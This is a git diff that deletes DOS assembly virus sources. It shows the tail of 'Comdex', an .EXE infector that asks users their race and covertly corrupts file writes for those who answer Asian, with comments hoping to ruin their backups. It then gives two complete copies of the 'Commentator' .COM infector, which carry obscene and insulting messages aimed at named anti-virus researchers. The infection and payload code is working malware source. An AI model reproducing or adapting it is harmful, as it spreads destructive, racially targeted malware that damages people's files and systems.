cs:[int21b],al ;self modifying code! - pop ax - db 0cdh ;int opcode -int21b: db 0cch ;overwritten to int 21h - push ax - mov ax,00 - mov word ptr cs:[internal],ax ;clear internal int 21 flag - mov ax,0cch - mov byte ptr cs:[int21b],al ;nuke it back to int 0cch - pop ax - retn - - - - db "Welcome to Comdex " - db "From the Interface Group, Inc. " - db "300 First Avenue " - db "Needham, MA 02194 " - db "(617)449-6600 " - db "For data recovery ask for " - db "Peter J. Bowes, unless you are " - db "Oriental, in which case, we will " - db "not help you. " - -quest db 0dh,0ah,"Software Piracy Prevention Center",0dh,0ah - db "requests your cooperation:",0dh,0ah,0dh,0ah - db "Please enter your race or nationality:",0dh,0ah - db "a. White e. Eastern European",0dh,0ah - db "b. Black f. Soviet",0dh,0ah - db "c. Hispanic g. Western European",0dh,0ah - db "d. Asian/Pacific Rim h. Other",0dh,0ah,0dh,0ah - db " Please enter your response: ","$" - -input_char: db 0 - db 3dh ;confuse disassemblers - -askit: push ax - push bx - push cx - push dx - push si - push di - push ds - push es - - cmp byte ptr cs:[min60],1 ;resident 1 hr yet? - jnz noask - cmp byte ptr cs:[input_char],0 - jnz noask ;don't ask twice - mov ax,word ptr cs:[timer] - and ax,000fh ;look at ls free running clock - cmp ax,000ch ;does it happen to be 00ch? (1 of 16) - jnz noask ;if not, don't ask the guy! - - mov dx,offset quest ;ask the guy about race - mov ah,09h ;dos string print - push cs - pop ds - call int21 ;print question on crt - mov ax,0c01h ;dos flush input and get char - call int21 ;get char - and al,0dfh ;force upper case - mov byte ptr cs:[input_char],al ;save away response -noask: pop es - pop ds - pop di - pop si - pop dx - pop cx - pop bx - pop ax - retn - -;******************************************************************** - -; -; int 9 (keyboard) replacement: -; this routine does not become active until 50 minutes after -; the execution of an affected program. -; -;new9: push ax -; push es -; cmp byte ptr cs:[min50],1 -; jnz retx1 - -;insert any code here that activates 50 min after launch for int 9... - -;retx1: pop es ;prepare to go to old int 9 code: -; pop ax -; db 0eah ;jmp 0000:0000 nmemonic -;old9 dw 0,0 ;storage for old addr - - -;******************************************************************** -; -; new int 14 (serial port) routine - -; -;new14: cmp ah,1 ;is it an output request? -; jz s1 ;yup. don't return just yet. -;do14: db 0eah ;jmp 0000:0000 nmemonic -;old14 dw 0,0 -;s1: - -;insert any code here for output to serial port... - -; jmp do14 - - -;******************************************************************** -; -; new int 8 routine (bios timer ticks) -; - db 3dh ;piss off disassemblers -new8: push dx - push cx - push bx - push ax - jmp txex ;&& - inc word ptr cs:[timer] ; increment timer - cmp byte ptr cs:[min60],01 ; if counter >= 60 min. - jz tt0 ; no need to check any more - cmp word ptr cs:[timer],-11 ; 60 minutes ? - jz tt1 - cmp word ptr cs:[timer],54601 ; 50 minutes ? - jz tt2 - jmp txex -; -; 50 minutes after an affected program is run the flag is set. -; -tt2: mov byte ptr cs:[min50],1 - jmp txex -; -; 60 minutes after an affected program is run this flag is set. -; -tt1: mov byte ptr cs:[min60],1 - -; exit interrupt routine: - - jmp txex -; -; every time an int 8 occurs, after the 60 min. have passed, we -; end up here: -; -tt0: -;insert any fun timer oriented code here -; -; restore registers and quit -; -txex: pop ax - pop bx - pop cx - pop dx - db 0eah -old8 dw 0,0 - -;******************************************************************** -; -; new int 17 routine. lpt out stuff. -; -new17: jmp do17 ;&& - cmp ah,0 - - jz p0 -do17: db 0eah -old17 dw 0,0 - db 2eh ;confuse disassemblers -p0: cmp byte ptr cs:[input_char],44h ;d. asian/pacific rim? - jne not_asian - push ax - mov ax,word ptr cs:[timer] - and ax,00ffh - cmp ax,0032h ; one of 256 odds - pop ax ; restore ax, doesn't change flags - jne do17 ; don't twiddle lpt 255/256 odds - cmp al,55h ; printing a "U"? - jne notu - mov al,0efh ; make it upside-down! - jmp do17 ; and continue. -notu: cmp al,06fh ; lower case "o"? - jne do17 ; no? then exit. - mov al,093h ; make it an "o" with a ^ over it! - jmp do17 ; and exit. -not_asian: - jmp do17 - - -;Int 21 file adjustment routines - the following routines corrupt a small -;percentage of the file writes that Asians do in their use of the pc. For -;example, when one updates a spreadsheet or exits a word processor, the -;application software will re-write the file out to disk. What we do here -;is reduce the amount of the data that is written to the file. The hope -;is that the problem will be hidden for a significant period of time, since -;it happens only infrequently, and since it typically will happen upon exit -;of the application package. If the reduction of the write causes a serious -;problem (we hope it will) it won't usually be noticed until that file is -;loaded again. The other hope is that if the user does backup his data from -;time to time, this corrupted data will end up on the backup as well before -;the problem is noticed. With luck, maybe the user will assume that the -;hardware is intermittent, and backup the system over the top of his only -;existing backup set, then purchase replacement hardware. - - - -fuck_size_f: ;if asian, reduce file rec size by 1 on fcb ops - push ax - push di - push dx ;setup di for indexed operations - pop di - cmp byte ptr cs:[input_char],044h ;asian? - jne exit_fuck_f ;no, then do nothing - mov ax,word ptr cs:[timer] - and ax,00ffh ;mask off ls 8 bits of free run timer - cmp ax,0069h ;does it happen to be 69h? (1 of 256) - jne exit_fuck_f ;nope, so do nothing - - mov al,[ds:di+0] ;get first byte of user's fcb - cmp al,0ffh ;extended fcb? - jne norm_fcb ;nope, so handle as normal fcb - mov ax,[ds:di+15h] ;get record size, 16 bits on extd fcb. - dec ax ;adjust it a bit, since the user really doesn't - ;need to write so much data. - mov [ds:di+15h],ax - jmp exit_fuck_f ;subsequent r/w ops should fail to get the - ;right data until this file is closed or - ;until system crashes. - -norm_fcb: - mov al,[ds:di+0eh] ;get record size, only 8 bits on norm fcb. - dec al ;reduce by 1 - mov [ds:di+0eh],al ;store it back -exit_fuck_f: - pop di - pop ax - jmp do21 - - -fuck_size_h: ;reduce length of handle file writes - push ax - push di - push dx - pop di - cmp byte ptr cs:[input_char],044h ;asian? - jne exit_fuck_h ;no, so don't damage anything. - mov ax,word ptr cs:[timer] - and ax,00ffh - cmp ax,0066h ;one out of 256 odds - jne try_again ;no? well give it another chance. - and cx,0fff5h ;reduce write length in bytes by a flakey amt - dec cx ;ranging from 1 to 11 bytes. -exit_fuck_h: - pop ax - jmp do21 - -try_again: - cmp ax,0077h ;one of 256 odds? - jne exit_fuck_h ;exit if not lucky. - mov ax,[ds:di+30h] ;get a user data byte from his buffer - xor ax,0004h ;toggle bit 2 of byte 30h - mov [ds:di+30h],ax ;and put it back - jmp exit_fuck_h - -;******************************************************************** -; -; this is the int 21 replacement. it only does something in -; the case of an execute program dos call. -; -;be careful here not to trap int codes that we use internally! -new21: jmp do21 ;&& - push ax - cmp word ptr cs:[internal],0ffh ;is it an internal int 21? - je do21 ;yup, so no tweaking allowed - pop ax - cmp ah,015h ;is it a fcb file write? - je fuck_size_f ;if asian, reduce record size by 1 - cmp ah,040h ;is it a handle file write? - je fuck_size_h ;if asian, adjust write length down. - cmp ah,4bh ;is it an int 21 code 4b? - je l5 ;yup. go affect stuff -do21: db 0eah ;nope. let dos handle it -old21 dw 0,0 -; -; the code to only affect every tenth program has been removed -; for now. restore this code later. -; - db 3dh ;confuse disassemblers -l5: call askit ;ask race if appropriate - push ax - push bx - push cx - push dx - push si - push ds -; -; search for the file name extension ... -; - mov bx,dx -l6: inc bx - cmp byte ptr [bx],'.' - je l8 - cmp byte ptr [bx],0 - jne l6 -; -; ... and quit unless it starts with "ex". -; -l7: pop ds - pop si - pop dx - pop cx - pop bx - pop ax - jmp do21 -l8: inc bx - cmp word ptr [bx],5845h ;"EX" - jne l7 -; -; when an .exe file is found, Comdex starts by turning off -; the read-only attribute. the read-only attribute is not restored -; when the file has been affected. -; - mov ax,4300h ; get attribute - call int21 - jc l7 - mov ax,4301h ; set attribute - and cx,0feh - call int21 - jc l7 -; -; next, the file is examined to see if it is already affected. -; the signature (4418 5f19) is stored in the last two words. -; - mov ax,3d02h ; open / write access - call int21 - jc l7 - mov bx,ax ; file handle in bx -; -; this part of the code is new: get date of file. -; - mov ax,5700h - call int21 - jc l9 - mov cs:[date1],dx - mov cs:[date2],cx -; - push cs ; now ds is no longer needed - pop ds -; -; the header of the file is read in at [id+8]. Comdex then -; modifies itself, according to the information stored in the -; header. (the original cs and ip addressed are stored). -; - mov dx,offset id+8 - mov cx,1ch - mov ah,3fh - call int21 - jc l9 - mov ax,ds:id[1ch] - mov ds:[org_ip],ax - inc ax ;confuse reader a little - mov ax,ds:id[1eh] - add ax,10h - mov ds:[org_cs],ax -; -; next the read/write pointer is moved to the end of the file-4, -; and the last 4 bytes read. they are compared to the signature, -; and if equal nothing happens. -; - mov ax,4202h - mov cx,-1 - mov dx,-4 - call int21 - jc l9 - add ax,4 - mov ds:[len_lo],ax - jnc l8a - inc dx -l8a: mov ds:[len_hi],dx -; -; this part of Comdex is new - check if it is below minimum length -; - cmp dx,0 - jne l8b - mov cl,13 - shr ax,cl - cmp ax,0 - jg l8b - nop - jmp short l9 -l8b: mov ah,3fh - mov cx,4 - mov dx,offset id+4 - call int21 - jnc l11 -l9: mov ah,3eh - call int21 -l10: jmp l7 - db 3eh ;confuse disassemblers -; -; compare to 4f43,444d which is first 4 letters of Comdex -; -l11: mov si,offset id+4 - mov ax,[si] - cmp ax,4f43h ;ascii "OC" - jne l12 - mov ax,[si+2] - cmp ax,444dh ;ascii "DM" - je l9 -; -; the file is not affected, so the next thing Comdex does is -; affect it. first it is padded so the length becomes a multiple -; of 16 bytes. this is done so Comdex code can start at a -; paragraph boundary. -; -l12: mov ax,ds:[len_lo] - and ax,0fh - jz l13 - mov cx,16 - sub cx,ax - nop - add ds:[len_lo],cx - jnc l12a - inc ds:[len_hi] -l12a: mov ah,40h - call int21 ;dos write to file - jc l9 -; -; next the main body of Comdex is written to the end. -; -l13: xor dx,dx - mov cx,offset id + 4 - mov ah,40h ;dos write to file - call int21 - jc l9 -; -; next the .exe file header is modified: -; -; first modify initial ip -; -f0: mov ax,offset labl - mov ds:id[1ch],ax -; -; modify starting cs = Comdex cs. it is computed as: -; -; (original length of file+padding)/16 - start of load module -; - mov dx,ds:[len_hi] - mov ax,ds:[len_lo] - mov cl,cs:[const1] ; modified a bit - shr dx,cl - rcr ax,cl - nop - shr dx,cl - rcr ax,cl - shr dx,cl - rcr ax,cl - nop - shr dx,cl - rcr ax,cl - sub ax,ds:id[10h] - mov ds:id[1eh],ax -; -; modify length mod 512 -; - add ds:[len_lo],offset id+4 - jnc l14 - inc ds:[len_hi] -l14: mov ax,ds:[len_lo] - and ax,511 - nop - mov ds:id[0ah],ax -; -; modify number of blocks used -; - mov dx,ds:[len_hi] - mov ax,ds:[len_lo] - add ax,511 - jnc l14a - inc dx -l14a: mov al,ah - mov ah,dl - shr ax,1 - mov ds:id[0ch],ax -; -; finally the modified header is written back to the start of the -; file. -; -wrtback:mov ax,4200h - xor cx,cx - xor dx,dx - call int21 ;dos move file pointer - jc endit - mov ah,40h - mov dx,offset id+8 - mov cx,1ch - call int21 ;dos write to file -; -; this part is new: restore old date. -; - mov dx,cs:[date1] - mov cx,cs:[date2] - mov ax,5701h - call int21 ;dos set file date and time - jc endit - inc word ptr cs:[noinf] -; -; affection is finished - close the file and execute it -; -endit: jmp l9 -; -; - -timer dw 0 ; number of timer (int 8) ticks -const1 db 1 ; the constant 1 -const0 dw 0 ; the constant 0 -internal dw 0 ; internal int 21 in effect. -min50 db 0 ; flag, set to 1 50 minutes after execution -min60 db 0 ; flag, set to 1 60 minutes after execution -vmode db 0 ; video mode -date1 dw ? ; date of file -date2 dw ? ; ditto. -len_lo dw ? -len_hi dw ? -noinf dw 0 ; number of affections -id label word - db "COMD" ; the signature of Comdex. -; -; a buffer, used for data from the file. -; - -Comdex endp -code ends - - end labl - \ No newline at end of file diff --git a/c/COMMENT1 (47).ASM b/c/COMMENT1 (47).ASM deleted file mode 100755 index 96f0f6a..0000000 --- a/c/COMMENT1 (47).ASM +++ /dev/null @@ -1,334 +0,0 @@ -;Ŀ -; Commentator Virus by Glenn... -;Ĵ -; This will be a Parasytic Non-Resident .COM infector. -; It will also infect COMMAND.COM. -; -.MODEL TINY - -Public VirLen,MovLen - -Code Segment para 'Code' -Assume Cs:Code,Ds:Code,Es:Code - - Org 100h - -Signature Equ 0DaDah ; Signature of virus! - -Buff1 Equ 0F100h -Buff2 Equ Buff1+2 -VirLen Equ Offset Einde-Offset Begin -MovLen Equ Offset Einde-Offset Mover -DTA Equ 0F000h -Proggie Equ DTA+1Eh -Lenny Equ DTA+1Ah - -MinLen Equ Virlen ;Minimale lengte te besmetten programma -MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma - -; -; This part will contain the actual virus code, for searching the -; next victim and infection of it. -; - -Begin: - Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk - DW Signature ; Herkenningsteken virus -Oversig: - Pushf ;------------------ - Push AX ; Alle registers opslaan voor - Push BX ; later gebruik van het programma - Push CX ; - Push DX ; - Push DS ; - Push ES ; - Push SS ; - Push SI ; - Push DI ;------------------ -InfectPart: - Mov AX,Sprong ;------------------ - Mov Buf1,AX ; Spronggegevens bewaren om - Mov BX,Source ; besmette programma te starten - Mov Buf2,BX ;------------------ - Mov AH,1Ah ; DTA area instellen op - Mov DX,DTA ; $DTA area - Int 21h ;------------------ -Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory - Mov Cx,1 ; - Lea DX,FindPath ; - Int 21h ;------------------ - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -KijkInfected: - Mov DX,Cs:[Lenny] ;------------------ - Cmp DX,MinLen ; Kijken of programmalengte voldoet - Jb ZoekNext ; aan de eisen van het virus - Cmp DX,MaxLen ; - Ja ZoekNext ;------------------ -On2: Mov AH,3Dh ; Zo ja , file openen en file handle - Mov AL,2 ; opslaan - Mov DX,Proggie ; - Int 21h ; - Mov FH,AX ;------------------ - Mov BX,AX ; - Mov AH,3Fh ; Lezen 1e 4 bytes van een file met - Mov CX,4 ; een mogelijk kenmerk van het virus - Mov DX,Buff1 ; - Int 21h ;------------------ -Sluiten: Mov AH,3Eh ; File weer sluiten - Int 21h ;------------------ - Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 - Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op - Jnz Infect ; morgoth virus. Als bestand al besmet -ZoekNext: - Mov AH,4Fh ;------------------ - Int 21h ; Zoeken naar volgende .COM file - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -Infect: - Mov DX,Proggie ; beveiliging weghalen - Mov AH,43h ; - Mov AL,1 ; - Xor CX,Cx - Int 21h ;------------------ - Mov AH,3Dh ; Bestand openen - Mov AL,2 ; - Mov DX,Proggie ; - Int 21h ;------------------ - Mov FH,AX ; Opslaan op stack van - Mov BX,AX ; datum voor later gebruik - Mov AH,57H ; - Mov AL,0 ; - Int 21h ; - Push CX ; - Push DX ;------------------ - Mov AH,3Fh ; Inlezen van eerste deel van het - Mov CX,VirLen+2 ; programma om later terug te - Mov DX,Buff1 ; kunnen plaatsen. - Int 21h ;------------------ - Mov AH,42H ; File Pointer weer naar het - Mov AL,2 ; einde van het programma - Xor CX,CX ; zetten - Xor DX,DX ; - Int 21h ;------------------ - Xor DX,DX ; Bepalen van de variabele sprongen - Add AX,100h ; in het virus (move-routine) - Mov Sprong,AX ; - Add AX,MovLen ; - Mov Source,AX ;------------------ - Mov AH,40H ; Move routine bewaren aan - Mov DX,Offset Mover ; einde van file - Mov CX,MovLen ; - Int 21h ;------------------ - Mov AH,40H ; Eerste deel programma aan- - Mov DX,Buff1 ; voegen na Move routine - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,42h ; File Pointer weer naar - Mov AL,0 ; het begin van file - Xor CX,CX ; sturen - Xor DX,DX ; - Int 21h ;------------------ - Mov AH,40h ; En programma overschrijven - Mov DX,Offset Begin ; met code van het virus - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,57h ; Datum van aangesproken file - Mov AL,1 ; weer herstellen - Pop DX ; - Pop CX ; - Int 21h ;------------------ - Mov AH,3Eh ; Sluiten file - Int 21h ;------------------ -Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer - Mov Source,BX ; op normaal zetten voor - Mov AX,Buf1 ; de Move routine - Mov Sprong,AX ;------------------ - Mov AH,1Ah ; DTA adres weer op normaal - Mov Dx,80h ; zetten en naar de Move - Int 21h ; routine springen - Mov Ah,2Ch - Int 21h - Xor DL,DL - Xchg Dh,Dl - Add Dx,Dx -; And Dx,11111110b - Add Dx,Offset MsgTab - Mov Si,Dx - Mov Dx,Cs:[SI] - Mov AH,9 - Int 21h - Jmp CS:[Sprong] ;------------------ - -Msgtab DW offset Msg1 - DW offset Msg2 - DW offset Msg3 - DW offset Msg4 - DW offset Msg5 - DW offset Msg6 - DW offset Msg7 - DW offset Msg8 - DW offset Msg9 - DW offset Msg10 - DW offset Msg11 - DW offset Msg12 - DW offset Msg13 - DW offset Msg14 - DW offset Msg15 - DW offset Msg16 - DW offset Msg17 - DW offset Msg18 - DW offset Msg19 - DW offset Msg20 - DW offset Msg21 - DW offset Msg22 - DW offset Msg23 - DW offset Msg24 - DW offset Msg25 - DW offset Msg26 - DW offset Msg27 - DW offset Msg28 - DW offset Msg29 - DW offset Msg30 - DW offset Msg31 - DW offset Msg32 - DW offset Msg33 - DW offset Msg34 - DW offset Msg35 - DW offset Msg36 - DW offset Msg37 - DW offset Msg38 - DW offset Msg39 - DW offset Msg40 - DW offset Msg41 - DW offset Msg42 - DW offset Msg43 - DW offset Msg44 - DW offset Msg45 - DW offset Msg46 - DW offset Msg47 - DW offset Msg48 - DW offset Msg49 - DW offset Msg50 - DW offset Msg51 - DW offset Msg52 - DW offset Msg53 - DW offset Msg54 - DW offset Msg55 - DW offset Msg56 - DW offset Msg57 - DW offset Msg58 - DW offset Msg59 - DW offset Msg60 - -Msg1 Db 13,10,'McAfee is a bum-hole',13,10,'$' -Msg2 Db 13,10,'Patricia Hoffman is a virgin',13,10,'$' -Msg3 Db 13,10,'David Grant is a shithead',13,10,'$' -Msg4 Db 13,10,'Jan Terpstra sucks',13,10,'$' -Msg5 Db 13,10,'Vesselin Bontchev is a lamer',13,10,'$' -Msg6 Db 13,10,'Righard Zwienenberg is a cowboy',13,10,'$' -Msg7 Db 13,10,'Greetings to Cracker Jack in Italy',13,10,'$' -Msg8 Db 13,10,'MS-DOS could be programmed better',13,10,'$' -Msg9 Db 13,10,'A virus may not hang, it must replicate!',13,10,'$' -Msg10 Db 13,10,'(C) by Glenn Benton DVRL',13,10,'$' -Msg11 Db 13,10,'HAHAHA you have a virus',13,10,'$' -Msg12 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$' -Msg13 Db 13,10,'Program to big to fit in ass',13,10,'$' -Msg14 Db 13,10,'Another program bites the dust',13,10,'$' -Msg15 Db 13,10,'Havahey! Another Me born to serve',13,10,'$' -Msg16 Db 13,10,'Deicide wasnt that good after all...',13,10,'$' -Msg17 Db 13,10,'DEICIDE, MORGOTH, BREEZE, BROTHER by Glenn Benton',13,10,'$' -Msg18 Db 13,10,'Hey! Gimme some more disks!',13,10,'$' -Msg19 Db 13,10,'Stealth techniques are cool',13,10,'$' -Msg20 Db 13,10,'Encryption is usefull...',13,10,'$' -Msg21 Db 13,10,'Stephanie my lovely girl',13,10,'$' -Msg22 Db 13,10,'FPROT is compiled BASIC',13,10,'$' -Msg23 Db 13,10,'Fuck da police!',13,10,'$' -Msg24 Db 13,10,'Source soon aveable for jokes!',13,10,'$' -Msg25 Db 13,10,'Why dont you play with something else?',13,10,'$' -Msg26 Db 13,10,'Thanks to BORLAND for Turbo Assembler',13,10,'$' -Msg27 Db 13,10,'It is time for NORTON SPEED DISK',13,10,'$' -Msg28 Db 13,10,'Donald duck is a lie...',13,10,'$' -Msg29 Db 13,10,'Why dont you buy me a CHEESEBURGER?',13,10,'$' -Msg30 Db 13,10,'Wim Kok is a COMMUNIST!!!!',13,10,'$' - -Msg31 Db 13,10,'Xabaras could be better',13,10,'$' -Msg32 Db 13,10,'FAT has a nice technique',13,10,'$' -Msg33 Db 13,10,'This virus is not resident!',13,10,'$' -Msg34 Db 13,10,'Nobody like debugging...',13,10,'$' -Msg35 Db 13,10,'60 Messages in here?',13,10,'$' -Msg36 Db 13,10,'Out of worktime',13,10,'$' -Msg37 Db 13,10,'RAM parity error',13,10,'$' -Msg38 Db 13,10,'Insert porn magazine in drive A',13,10,'$' -Msg39 Db 13,10,'Insert tracktor toilet paper in printer',13,10,'$' -Msg40 Db 13,10,'Upload this virus to McAfee, please',13,10,'$' -Msg41 Db 13,10,'HIP-HOP sucks!',13,10,'$' -Msg42 Db 13,10,'Vote for Saddam.',13,10,'$' -Msg43 Db 13,10,'DEAD BY DAWN',13,10,'$' -Msg44 Db 13,10,'NAIL HIM LIKE JESUS!',13,10,'$' -Msg45 Db 13,10,'May I fuck with your wife?',13,10,'$' -Msg46 Db 13,10,'Hey CJ! What abouth a Corporation (I&DVRL)',13,10,'$' -Msg47 Db 13,10,'Thanx to Oliver North for giving me TASM',13,10,'$' -Msg48 Db 13,10,'Do not use drugs, make a virus!',13,10,'$' -Msg49 Db 13,10,'Register this produkt!',13,10,'$' -Msg50 Db 13,10,'This virus is SHAREWARE',13,10,'$' -Msg51 Db 13,10,'You will hate me for this',13,10,'$' -Msg52 Db 13,10,'See the sunny side of life',13,10,'$' -Msg53 Db 13,10,'DAME EDNA IS COOL!',13,10,'$' -Msg54 Db 13,10,'I like the pope, the pope smokes dope!',13,10,'$' -Msg55 Db 13,10,'We like the pope, he gives us his dope!',13,10,'$' -Msg56 Db 13,10,'Are you FLINTSTONED???',13,10,'$' -Msg57 Db 13,10,'How about a game of STRIP-POKER?',13,10,'$' -Msg58 Db 13,10,'FACES OF DEATH!',13,10,'$' -Msg59 Db 13,10,'Just one more message!!!',13,10,'$' -Msg60 Db 13,10,'Spread this like hell!',13,10,'$' - -; -; All variables are stored in here, like filehandle, date/time, -; search path and various buffers. -; - -FH DW 0 -FindPath DB '*.COM',0 - -Buf1 DW 0 -Buf2 DW 0 - -Sprong DW 0 -Source DW 0 - -; -; This will contain the relocator routine, located at the end of -; the ORIGINAL file. This will tranfer the 1st part of the program -; to it's original place. -; -Mover: - Mov DI,Offset Begin ;------------------ - Mov SI,Source ; Verplaatsen van het 1e deel - Mov CX,VirLen-1 ; van het programma, wat achter - Rep Movsb ;------------------ - Pop DI ; Opgeslagen registers weer - Pop SI ; terugzetten op originele - Pop SS ; waarde en springen naar - Pop ES ; het begin van het programma - Pop DS ; (waar nu het virus niet meer - Pop DX ; staat) - Pop CX ; - Pop BX ; - Pop AX ; - Popf ; - Mov BX,100h ; - Jmp BX ;------------------ - -; -; Only the end of the virus is stored in here. -; -Einde db 0 - -Code Ends -End Begin - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/c/COMMENT2 (48).ASM b/c/COMMENT2 (48).ASM deleted file mode 100755 index 68efded..0000000 --- a/c/COMMENT2 (48).ASM +++ /dev/null @@ -1,334 +0,0 @@ -;Ŀ -; Commentator Virus by Glenn... -;Ĵ -; This will be a Parasytic Non-Resident .COM infector. -; It will also infect COMMAND.COM. -; -.MODEL TINY - -Public VirLen,MovLen - -Code Segment para 'Code' -Assume Cs:Code,Ds:Code,Es:Code - - Org 100h - -Signature Equ 0DeDeh ; Signature of virus! - -Buff1 Equ 0F100h -Buff2 Equ Buff1+2 -VirLen Equ Offset Einde-Offset Begin -MovLen Equ Offset Einde-Offset Mover -DTA Equ 0F000h -Proggie Equ DTA+1Eh -Lenny Equ DTA+1Ah - -MinLen Equ Virlen ;Minimale lengte te besmetten programma -MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma - -; -; This part will contain the actual virus code, for searching the -; next victim and infection of it. -; - -Begin: - Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk - DW Signature ; Herkenningsteken virus -Oversig: - Pushf ;------------------ - Push AX ; Alle registers opslaan voor - Push BX ; later gebruik van het programma - Push CX ; - Push DX ; - Push DS ; - Push ES ; - Push SS ; - Push SI ; - Push DI ;------------------ -InfectPart: - Mov AX,Sprong ;------------------ - Mov Buf1,AX ; Spronggegevens bewaren om - Mov BX,Source ; besmette programma te starten - Mov Buf2,BX ;------------------ - Mov AH,1Ah ; DTA area instellen op - Mov DX,DTA ; $DTA area - Int 21h ;------------------ -Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory - Mov Cx,1 ; - Lea DX,FindPath ; - Int 21h ;------------------ - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -KijkInfected: - Mov DX,Cs:[Lenny] ;------------------ - Cmp DX,MinLen ; Kijken of programmalengte voldoet - Jb ZoekNext ; aan de eisen van het virus - Cmp DX,MaxLen ; - Ja ZoekNext ;------------------ -On2: Mov AH,3Dh ; Zo ja , file openen en file handle - Mov AL,2 ; opslaan - Mov DX,Proggie ; - Int 21h ; - Mov FH,AX ;------------------ - Mov BX,AX ; - Mov AH,3Fh ; Lezen 1e 4 bytes van een file met - Mov CX,4 ; een mogelijk kenmerk van het virus - Mov DX,Buff1 ; - Int 21h ;------------------ -Sluiten: Mov AH,3Eh ; File weer sluiten - Int 21h ;------------------ - Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 - Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op - Jnz Infect ; morgoth virus. Als bestand al besmet -ZoekNext: - Mov AH,4Fh ;------------------ - Int 21h ; Zoeken naar volgende .COM file - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -Infect: - Mov DX,Proggie ; beveiliging weghalen - Mov AH,43h ; - Mov AL,1 ; - Xor CX,Cx - Int 21h ;------------------ - Mov AH,3Dh ; Bestand openen - Mov AL,2 ; - Mov DX,Proggie ; - Int 21h ;------------------ - Mov FH,AX ; Opslaan op stack van - Mov BX,AX ; datum voor later gebruik - Mov AH,57H ; - Mov AL,0 ; - Int 21h ; - Push CX ; - Push DX ;------------------ - Mov AH,3Fh ; Inlezen van eerste deel van het - Mov CX,VirLen+2 ; programma om later terug te - Mov DX,Buff1 ; kunnen plaatsen. - Int 21h ;------------------ - Mov AH,42H ; File Pointer weer naar het - Mov AL,2 ; einde van het programma - Xor CX,CX ; zetten - Xor DX,DX ; - Int 21h ;------------------ - Xor DX,DX ; Bepalen van de variabele sprongen - Add AX,100h ; in het virus (move-routine) - Mov Sprong,AX ; - Add AX,MovLen ; - Mov Source,AX ;------------------ - Mov AH,40H ; Move routine bewaren aan - Mov DX,Offset Mover ; einde van file - Mov CX,MovLen ; - Int 21h ;------------------ - Mov AH,40H ; Eerste deel programma aan- - Mov DX,Buff1 ; voegen na Move routine - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,42h ; File Pointer weer naar - Mov AL,0 ; het begin van file - Xor CX,CX ; sturen - Xor DX,DX ; - Int 21h ;------------------ - Mov AH,40h ; En programma overschrijven - Mov DX,Offset Begin ; met code van het virus - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,57h ; Datum van aangesproken file - Mov AL,1 ; weer herstellen - Pop DX ; - Pop CX ; - Int 21h ;------------------ - Mov AH,3Eh ; Sluiten file - Int 21h ;------------------ -Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer - Mov Source,BX ; op normaal zetten voor - Mov AX,Buf1 ; de Move routine - Mov Sprong,AX ;------------------ - Mov AH,1Ah ; DTA adres weer op normaal - Mov Dx,80h ; zetten en naar de Move - Int 21h ; routine springen - Mov Ah,2Ch - Int 21h - Xor DL,DL - Xchg Dh,Dl - Add Dx,Dx -; And Dx,11111110b - Add Dx,Offset MsgTab - Mov Si,Dx - Mov Dx,Cs:[SI] - Mov AH,9 - Int 21h - Jmp CS:[Sprong] ;------------------ - -Msgtab DW offset Msg1 - DW offset Msg2 - DW offset Msg3 - DW offset Msg4 - DW offset Msg5 - DW offset Msg6 - DW offset Msg7 - DW offset Msg8 - DW offset Msg9 - DW offset Msg10 - DW offset Msg11 - DW offset Msg12 - DW offset Msg13 - DW offset Msg14 - DW offset Msg15 - DW offset Msg16 - DW offset Msg17 - DW offset Msg18 - DW offset Msg19 - DW offset Msg20 - DW offset Msg21 - DW offset Msg22 - DW offset Msg23 - DW offset Msg24 - DW offset Msg25 - DW offset Msg26 - DW offset Msg27 - DW offset Msg28 - DW offset Msg29 - DW offset Msg30 - DW offset Msg31 - DW offset Msg32 - DW offset Msg33 - DW offset Msg34 - DW offset Msg35 - DW offset Msg36 - DW offset Msg37 - DW offset Msg38 - DW offset Msg39 - DW offset Msg40 - DW offset Msg41 - DW offset Msg42 - DW offset Msg43 - DW offset Msg44 - DW offset Msg45 - DW offset Msg46 - DW offset Msg47 - DW offset Msg48 - DW offset Msg49 - DW offset Msg50 - DW offset Msg51 - DW offset Msg52 - DW offset Msg53 - DW offset Msg54 - DW offset Msg55 - DW offset Msg56 - DW offset Msg57 - DW offset Msg58 - DW offset Msg59 - DW offset Msg60 - -Msg1 Db 13,10,'Cycle sluts from hell',13,10,'$' -Msg2 Db 13,10,'Virus Mania IV',13,10,'$' -Msg3 Db 13,10,'2 Live Crew is fucking cool',13,10,'$' -Msg4 Db 13,10,'Like Commentator I, HIP-HOP sucks',13,10,'$' -Msg5 Db 13,10,'Dr. Ruth is a first-class lady!',13,10,'$' -Msg6 Db 13,10,'Dont be a wimp, be dead!',13,10,'$' -Msg7 Db 13,10,'This dick was made for laying girls.',13,10,'$' -Msg8 Db 13,10,'No virus entry, just me!',13,10,'$' -Msg9 Db 13,10,'Dont bite it, you horny bitch!',13,10,'$' -Msg10 Db 13,10,'Stroke my keys, oh YES!',13,10,'$' -Msg11 Db 13,10,'Sex Revolution 4000',13,10,'$' -Msg12 Db 13,10,'Buck Rogers is 